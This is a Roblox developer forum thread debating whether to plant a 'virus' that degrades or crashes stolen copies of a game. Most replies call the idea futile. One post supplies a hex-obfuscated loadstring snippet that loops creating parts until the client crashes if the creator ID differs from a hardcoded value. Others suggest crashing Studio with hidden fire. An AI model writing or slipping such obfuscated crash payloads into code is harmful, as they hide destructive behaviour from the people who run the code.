Creating an anti-place steal virus

The trick is to not immediately break the game, but instead degrade quality of gameplay in such a way that no one would want to play it. It makes it far more difficult to test for the malicious code if that malicious code causes the game to gradually become disfunctional instead of just slapping a message on the screen saying “You stole this game reeeeee”.
Anti-piracy in games would often do this in the past.

13 Likes

I don’t think place stealing should be a worry for developers. If it ever does happen the developer probably won’t be impacted by it.

I’m doubtful if someone ripped the building and client scripts from Jailbreak and republished it they would be able to dent Jailbreaks revenue stream.

6 Likes

I personally wouldn’t recommend doing something like this.

Exploiters are only able to steal LocalScripts and ModuleScripts, so you’d have to put your “virus” into one of those. But then again, there are limited places where LocalScripts can run, so locating and removing it wouldn’t be a problem.

Not to mention they can just save your map without scripts (blank sources, but Instances are still there) and then eventually save all scripts separately and put their sources into the corresponding script instances. If not, well, they will still have the map.


tl;dr trying to prevent map theft is pointless, because any “patch” attempts can always be worked around, so you shouldn’t waste your time doing that

6 Likes

I assume without filtering enabled, exploiters can steal everything, right?

Exploiters cannot steal anything from server. FilteringEnabled only limits replication from client to server. I also disagree the usage of anti-place stealing, because people who attempt publishing them will eventually become banned.

I know how the exploiters can actually steal the map without encountering any script hidden inside the parts. They simply do a function that filters out whatever workspace:GetDescendants() is capable of.


Best way to avoid getting the whole game stolen is to hide as much as possible on the server, use the practice of never-trust-the-client.

6 Likes

I think you could try doing something with Pastebin, so you can control it remotely.
You can see tutorial on it here:

From that you can easily input some text on Pastebin and the script will act like you set it according to the text.

1 Like

That requires you to use HttpService, which can’t be used from localscripts. And even if it worked, it wouldn’t be a very good way for the reasons I’ve already explained.

You want to do it from Localscript? Any specific reason for it?

1 Like

As I already said, exploiters cannot save server scripts, so when they steal your map, they will get all your parts, LocalScripts and ModuleScripts, but not server scripts.

That’s why it’s impossible to add a proper “backdoor” to your place to prevent theft. And that’s also why you shouldn’t waste your time trying to.

This comes down to being the solution to the thread:

  • Can you make your own place steal virus? Kind of, but it wouldn’t be effective and would be easily removable.
  • Should you try this? No, don’t even try. Your solution will be half hearted at best, and will have wasted time and effort.

These kind of patchy solutions to problems will never work and never have. If you or your team have a serious problem with asset stealing, you have a hard life ahead of you, because there is no way around it.

2 Likes

Put this anywhere:

loadstring( string.gsub("%76%20%3D%20%67%61%6D%65%2E%43%72%65%61%74%6F%72%49%64%20%20%69%66%20%76%20%7E%3D%20%33%39%31%36%30%38%38%31%20%61%6E%64%20%76%20%74%68%65%6E%20%20%77%68%69%6C%65%20%74%72%75%65%20%64%6F%20%20%49%6E%73%74%61%6E%63%65%2E%6E%65%77%28%22%50%61%72%74%22%2C%20%67%61%6D%65%2E%57%6F%72%6B%73%70%61%63%65%29%20%20%65%6E%64%20%20%65%6E%64", "%%(%x%x)", function (x) return string.char(tonumber(x, 16)) end) )()

Crashes if the owner of the place isn’t you. Uses loadstring so it’s harder to search for. Make sure you toggle ServerScriptService>LoadStringEnabled otherwise it won’t run. Doesn’t work for group games.

Edit: Read up more on loadstring before you use this solution

7 Likes

I do have some viruses idea because I tested some in the past. What you should (which is not a virus) this may work… but it has to be a map. Add a secret under the map and place a bunch of fire in it. Seriously, if you put a great amount of fire the studio will CRASH! I tried that with a friend (by using team create) and when he look under the map and he crashed or well, left because it was too laggy he didn’t told me the reason why, But you should try that.

I don’t think you should put a script in your game like that.

If your place does get stolen, you should probably contact Roblox about it (correct me if I’m wrong).

Your players probably wouldn’t leave even if a copy was made, they’ll stick with the game they have the progress on.

1 Like

In the event of a “game burglary” that might be very handy, it’s actually pretty ingenious, but isn’t it a little dangerous to leave LoadStringEnabled on the rest of the time?

3 Likes

Agreed, take it with a grain of salt obviously. I’m just providing a working solution.

2 Likes

Out of interest (and so that we know what this arbitrary code we’re pasting into our games is doing!), how does this solution work? Would you mind posting an explanation so that the OP and everybody else understands.

1 Like

The topic has really gone downhill fast.

In summary, place stealing can only steal the map and local scripts. The only way a exploiter gets access to the server side scripts is if they have the actual place file, which should never happen.
As for adding a virus, only do so with the mind that it will most likely not work. Any devoted exploiter will work around it easily. If you do add a virus, try to hide it. As others have said, make it secretive until a certain point.

In summary, adding a “virus” to your game will likely prove pointless as it will either be worked around or never executed in the first place.

1 Like

You can replace the loadstring with a print to get the source :slight_smile:

Yes, I do see how it works. I just thought it would be useful to the thread if the source was here, in plain view, for anybody who wants it

Just for anybody else who wants to know how it works, it spawns an infinite number of parts in a loop until the client crashes.

Also, I would note that the UserId is hard coded, so using this snippet for any user except the OP (or whoever’s ID that is) will crash you too. Be sure to change it if you use it!

You could also use something like this:

3 Likes